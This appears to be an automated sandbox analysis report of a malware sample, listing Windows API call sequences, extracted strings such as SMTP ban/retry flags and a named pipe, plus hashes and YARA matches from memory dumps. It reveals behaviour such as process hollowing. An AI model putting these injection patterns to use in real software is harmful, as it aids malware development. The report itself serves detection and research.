                                                                                        • Instruction ID: f05c316c61bcb28915cab05b62406ddbdd3d3baa158ec9061dde4696046bcb2b
                                                                                        • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                        • Instruction Fuzzy Hash: 1E31B331A00706ABDF519BB89C48BAE77B8AF04364F1441A5E918E3390EB78DD41DB58
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?), ref: 02D795A7
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 02D795D5
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 02D795DC
                                                                                        • wsprintfA.USER32 ref: 02D79635
                                                                                        • wsprintfA.USER32 ref: 02D79673
                                                                                        • wsprintfA.USER32 ref: 02D796F4
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02D79758
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02D7978D
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02D797D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3696105349-0
                                                                                        • Opcode ID: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction ID: b168472e26b943e6a803ffa50bcb3a5755e3bbb790e70de9a009b0a2d6f84749
                                                                                        • Opcode Fuzzy Hash: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction Fuzzy Hash: 2FA16CB2900258AFEB21DFA4CC45FDA3BADEB04745F104026FA15D6251F7B9D984CFA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 3560063639-3847274415
                                                                                        • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                        • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                        • API String ID: 1586166983-1625972887
                                                                                        • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                        • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                        • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                        • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                        • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3188212458-0
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: ab228a986819567a034f5778c60117e3a6ddbbfebf067212e33de9fc62893814
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 6C31F1B2900108BFDB00DFA09D44ADF7F78EF48310F158076E212F7291D674A9618F69
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 02D767C3
                                                                                        • htonl.WS2_32(?), ref: 02D767DF
                                                                                        • htonl.WS2_32(?), ref: 02D767EE
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D768F1
                                                                                        • ExitProcess.KERNEL32 ref: 02D769BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Processhtonl$CurrentExitHugeRead
                                                                                        • String ID: except_info$localcfg
                                                                                        • API String ID: 1150517154-3605449297
                                                                                        • Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                        • Instruction ID: 126f005f765f380df6f3008adefa1c950c60ebc7628392498afad693c739c2fd
                                                                                        • Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                        • Instruction Fuzzy Hash: 0C615F71940208AFDB609FB4DC45FEA77E9FB08300F248066F96DD2261EB759994CF64
                                                                                        APIs
                                                                                        • htons.WS2_32(02D7CC84), ref: 02D7F5B4
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 02D7F5CE
                                                                                        • closesocket.WS2_32(00000000), ref: 02D7F5DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                        • Instruction ID: f20aeb8f8de8b69f2a170ebdaeb1b1876f290846d15cfa2081cff548900abd47
                                                                                        • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                        • Instruction Fuzzy Hash: DD315C72900118AFDB20DFA9DC88DEE7BBCEF89310F104566F915E3250E7749A81CBA4
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                        • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                        • wsprintfA.USER32 ref: 00407036
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                        • String ID: /%d$|
                                                                                        • API String ID: 676856371-4124749705
                                                                                        • Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                        • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                        • Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                        • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 02D72FA1
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02D72FB1
                                                                                        • GetProcAddress.KERNEL32(00000000,004103F0), ref: 02D72FC8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02D73000
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D73007
                                                                                        • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02D73032
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: dnsapi.dll
                                                                                        • API String ID: 1242400761-3175542204
                                                                                        • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                        • Instruction ID: 6e2e44892aba79e0faa5dfc7f889ef1b39e8059119c3b01d3d2255e71ac78bb2
                                                                                        • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                        • Instruction Fuzzy Hash: 6B215E71901629ABCB219F65DC48AAEFBB8EF08B50F104461F905E7240E7B89E81D7E4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                        • API String ID: 1082366364-3395550214
                                                                                        • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                        • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                        • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                        • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02D79A18
                                                                                        • GetThreadContext.KERNEL32(?,?), ref: 02D79A52
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 02D79A60
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02D79A98
                                                                                        • SetThreadContext.KERNEL32(?,00010002), ref: 02D79AB5
                                                                                        • ResumeThread.KERNEL32(?), ref: 02D79AC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2981417381-2746444292
                                                                                        • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction ID: 37bf9c6e07786be4f9647112959d222b6e332a51f01c15f5fd6d290d1f34355b
                                                                                        • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction Fuzzy Hash: 00213D72902219BBDB11DBA1DC09EEF7BBCEF05750F404061BA19E5150F7758A44CBA4
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(004102D8), ref: 02D71C18
                                                                                        • LoadLibraryA.KERNEL32(004102C8), ref: 02D71C26
                                                                                        • GetProcessHeap.KERNEL32 ref: 02D71C84
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02D71C9D
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02D71CC1
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000), ref: 02D71D02
                                                                                        • FreeLibrary.KERNEL32(?), ref: 02D71D0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID:
                                                                                        • API String ID: 2324436984-0
                                                                                        • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction ID: 14b6787d71960f9e02af9a6b42ed8cdad0d189e2c1c240fcc0e2af4277dca92c
                                                                                        • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction Fuzzy Hash: FD314F32D00219BFCB119FE4DC889FEBBB9EB45715B24457AE505A2210E7B98E80DB94
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02D76CE4
                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D76D22
                                                                                        • GetLastError.KERNEL32 ref: 02D76DA7
                                                                                        • CloseHandle.KERNEL32(?), ref: 02D76DB5
                                                                                        • GetLastError.KERNEL32 ref: 02D76DD6
                                                                                        • DeleteFileA.KERNEL32(?), ref: 02D76DE7
                                                                                        • GetLastError.KERNEL32 ref: 02D76DFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3873183294-0
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: 6e230930f357d880c8bd69307e9d0933cb11d1e4742218acc4d598edea20a12f
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 1731CE76900649BFCB019FA49D48ADEBF7DEB48310F148065E251A3350F774CA95CBA1
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02D77043), ref: 02D76F4E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02D76F55
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02D76F7B
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02D76F92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$\\.\pipe\kosqarwi
                                                                                        • API String ID: 1082366364-2431561582
                                                                                        • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                        • Instruction ID: 12b1257702d5e4e70185255e68eabb091982102b42f08e80b042f0f6072c48f6
                                                                                        • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                        • Instruction Fuzzy Hash: 7121BE217413407EF72253359C88FAB6A5C8B52724F2840A5F944A66D0FBDD8896C2BD
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: $localcfg
                                                                                        • API String ID: 1659193697-2018645984
                                                                                        • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction ID: b1dd999890676c2b8dc623990288034b0d7d3946b162ae97b2982431e4f06fad
                                                                                        • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction Fuzzy Hash: 05711572A04318BADF318B54DC85BEE376AEB00719F244067F904A6390FF6E9D84CB65
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                          • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 0040DDB5
                                                                                        • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                        • String ID: flags_upd$localcfg
                                                                                        • API String ID: 204374128-3505511081
                                                                                        • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                        • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                        APIs
                                                                                          • Part of subcall function 02D7DF6C: GetCurrentThreadId.KERNEL32 ref: 02D7DFBA
                                                                                        • lstrcmp.KERNEL32(00410178,00000000), ref: 02D7E8FA
                                                                                        • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02D76128), ref: 02D7E950
                                                                                        • lstrcmp.KERNEL32(?,00000008), ref: 02D7E989
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                        • String ID: A$ A$ A
                                                                                        • API String ID: 2920362961-1846390581
                                                                                        • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                        • Instruction ID: 3822b82cf05dafa36eddff9b25dc09871f150faed07e03a27e62ec472384e611
                                                                                        • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                        • Instruction Fuzzy Hash: B631BC32A007069BCB71CF24C884BA67BE8EF05324F5089AAE59587750F378EC80CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                        • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction ID: 6ff93602cee4b69462429362f79409f50434224adad5fc503416e7a7be49b98e
                                                                                        • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                        • Instruction Fuzzy Hash: 6E214A72204619BFDB119BA0EC48EDF3FADEB49264B108465F502D1190FB78DE40DAB4
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                        • wsprintfA.USER32 ref: 004090E9
                                                                                        • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                        • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2439722600-0
                                                                                        • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                        • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?), ref: 02D792E2
                                                                                        • wsprintfA.USER32 ref: 02D79350
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D79375
                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 02D79389
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 02D79394
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02D7939B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2439722600-0
                                                                                        • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction ID: 335f1503cbce858f8bc7a9f44c9411c4f855766901c2b2bacf221a1e92366bf9
                                                                                        • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction Fuzzy Hash: 071172B26401147BE7206B31EC0DFEF7A6EDBC8B10F008065BB09E5190FAB84E418A74
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                        • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                        • Sleep.KERNEL32(00000000,?,75920F10,?,00000000,0040E538,?,75920F10,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                        • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3819781495-0
                                                                                        • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                        • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 02D7C6B4
                                                                                        • InterlockedIncrement.KERNEL32(02D7C74B), ref: 02D7C715
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,02D7C747), ref: 02D7C728
                                                                                        • CloseHandle.KERNEL32(00000000,?,02D7C747,00413588,02D78A77), ref: 02D7C733
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1026198776-1857712256
